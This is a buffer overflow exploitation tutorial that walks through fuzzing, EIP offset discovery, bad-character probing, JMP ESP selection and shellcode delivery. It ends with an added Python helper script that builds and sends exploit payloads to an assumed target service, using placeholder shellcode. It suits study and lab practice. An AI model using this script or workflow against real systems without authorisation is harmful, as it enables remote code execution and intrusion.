Buffer Overflow
The information in this section is compiled from John Hammond, Try Hack Me, Tib3rius, SecurityTube DoStackBufferOverflowGood, and Corelan. All links can be found in the Resources section. This section focuses mostly on process and tools.
Basic Process
Enumerate Services
Fuzzing
Finding the Offset
Overwriting the EIP
Finding the Bad Characters
Finding the Right Module
Gain Access
In actuality, each of these steps involves several substeps. The process looks simple and quick, but it can be very time consuming on anything but the simplest buffer overflow.
Enumerate Services
Find a running service that receives input that may be vulnerable to a buffer overflow, for example a network service that accepts a command followed by a string argument.
Fuzzing
Send increasingly long strings of characters to a command or function to see if the program crashes. The SPIKE tools (for example generic_send_tcp with a .spk template) can be used for this, or a simple script that sends growing buffers until the service stops responding. Note the approximate length at which the crash occurred; it sets the size of the pattern used in the next step.
Finding the Offset
Figure out at what point in the stream of data sent to the program the EIP is overwritten. Send a unique, non-repeating pattern (msf-pattern_create -l <length>) instead of plain 'A's, read the value in EIP when the program crashes, and look it up with msf-pattern_offset -q <value> to get the exact offset.
Overwriting the EIP
Once you have the offset, send that many bytes of padding followed by four distinct bytes (for example 'BBBB') and confirm in the debugger that EIP reads 0x42424242. If it does, you control EIP.
Find the Bad Characters
Send the program every byte value from \x01 to \xff after the EIP overwrite and compare, in the debugger, what actually landed on the stack with what was sent; any byte that is missing or altered is a bad character. '\x00' is almost always bad (it terminates C strings), which is why it is left out of the probe. Because one bad character can corrupt every byte that follows it, remove only the first bad character found and repeat until the whole sequence arrives intact.
Finding the Right Module
You will need to find a module loaded by the program that contains a JMP ESP (or equivalent) instruction you can use to redirect execution to the stack memory you control. The module should have no protections such as ASLR, DEP, SafeSEH or Rebase (in Immunity Debugger, !mona modules lists them), and the address of the instruction must not contain any of the bad characters. The address is written into the payload in little-endian byte order.
Gain Access
Generate shellcode that avoids the bad characters (for example with msfvenom and its -b option), prepend a short NOP sled so the jump lands safely, place it after the return address, start a listener, and send the final payload to the program.
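The steps above as a single script. This is an added example, not code from the original page or from any of the cited authors: it reimplements the pattern generation and offset lookup that msf-pattern_create and msf-pattern_offset perform, builds the bad-character probe, checks a candidate return address against the bad-character list, and assembles the final payload. The target address and port, the command prefix OVERFLOW1, the EIP value 0x6F43396E, the bad characters, the JMP ESP address 0x625011AF and the placeholder shellcode are all assumptions chosen for illustration.

```python
"""Helpers for the stack-overflow workflow: fuzz, find the offset,
probe bad characters, build the final payload.  Added example, not
taken from the original page or the cited authors.  TARGET, PORT,
PREFIX, the JMP ESP address and the shellcode below are assumptions."""
import socket
import struct
from itertools import product

TARGET = "10.10.10.10"   # assumed target, change before use
PORT = 1337              # assumed port
PREFIX = b"OVERFLOW1 "   # assumed vulnerable command prefix


def fuzz_buffers(start=100, step=100, limit=3000):
    """Growing buffers of 'A's; send each until the service stops answering."""
    return [b"A" * n for n in range(start, limit + 1, step)]


def msf_pattern(length):
    """Non-repeating pattern Aa0Aa1Aa2...; same output as msf-pattern_create -l."""
    upper = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    lower = "abcdefghijklmnopqrstuvwxyz"
    digits = "0123456789"
    out = []
    for up, lo, dg in product(upper, lower, digits):
        out.append(up + lo + dg)
        if len(out) * 3 >= length:
            break
    return "".join(out)[:length].encode()


def pattern_offset(pattern, eip_value):
    """Offset of the 4 bytes the debugger shows in EIP (msf-pattern_offset -q).
    EIP is displayed little-endian, so pack the value the same way."""
    return pattern.find(struct.pack("<I", eip_value))


def badchar_probe(known_bad=(0x00,)):
    """Every byte \\x01..\\xff except those already identified as bad."""
    return bytes(b for b in range(1, 256) if b not in known_bad)


def first_mismatch(sent, observed):
    """Compare the probe with the bytes dumped from the stack; return the first
    byte that was dropped or altered, or None if everything arrived intact.
    Only the first difference is trustworthy: a bad byte corrupts what follows."""
    for a, b in zip(sent, observed):
        if a != b:
            return a
    return None if len(observed) >= len(sent) else sent[len(observed)]


def contains_badchars(data, badchars):
    """Bytes of data (e.g. a JMP ESP address) that collide with the bad-char list."""
    return sorted({b for b in data if b in badchars})


def build_payload(offset, jmp_esp, shellcode, nops=16):
    """PREFIX + padding up to EIP + little-endian return address + NOP sled + shellcode."""
    ret = struct.pack("<I", jmp_esp)   # 0x625011AF -> b"\xaf\x11\x50\x62"
    return PREFIX + b"A" * offset + ret + b"\x90" * nops + shellcode


def send(payload, host=TARGET, port=PORT, timeout=5):
    """Deliver one buffer to the service; False means it no longer responds."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.recv(1024)                 # banner, if the service sends one
            s.sendall(payload + b"\r\n")
            return True
    except OSError:
        return False


if __name__ == "__main__":
    # Offline walk-through with constructed values; nothing is sent.
    pat = msf_pattern(2400)
    offset = pattern_offset(pat, 0x6F43396E)  # value copied from EIP in the debugger
    bad = {0x00, 0x07, 0x2E, 0xA0}            # example bad characters found by probing
    jmp_esp = 0x625011AF                      # example JMP ESP in an unprotected module
    assert not contains_badchars(struct.pack("<I", jmp_esp), bad)
    shellcode = b"\xcc" * 4                   # placeholder; use msfvenom -b with the real bad chars
    payload = build_payload(offset, jmp_esp, shellcode)
    print(f"offset={offset} payload_len={len(payload)}")
```

In practice each stage is a separate run against the live service: send fuzz_buffers until the crash, send msf_pattern of about that length and feed the EIP value to pattern_offset, send badchar_probe and feed the stack dump to first_mismatch (repeating with the found byte added to known_bad), and only then build_payload with the real shellcode and a listener waiting.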
Resources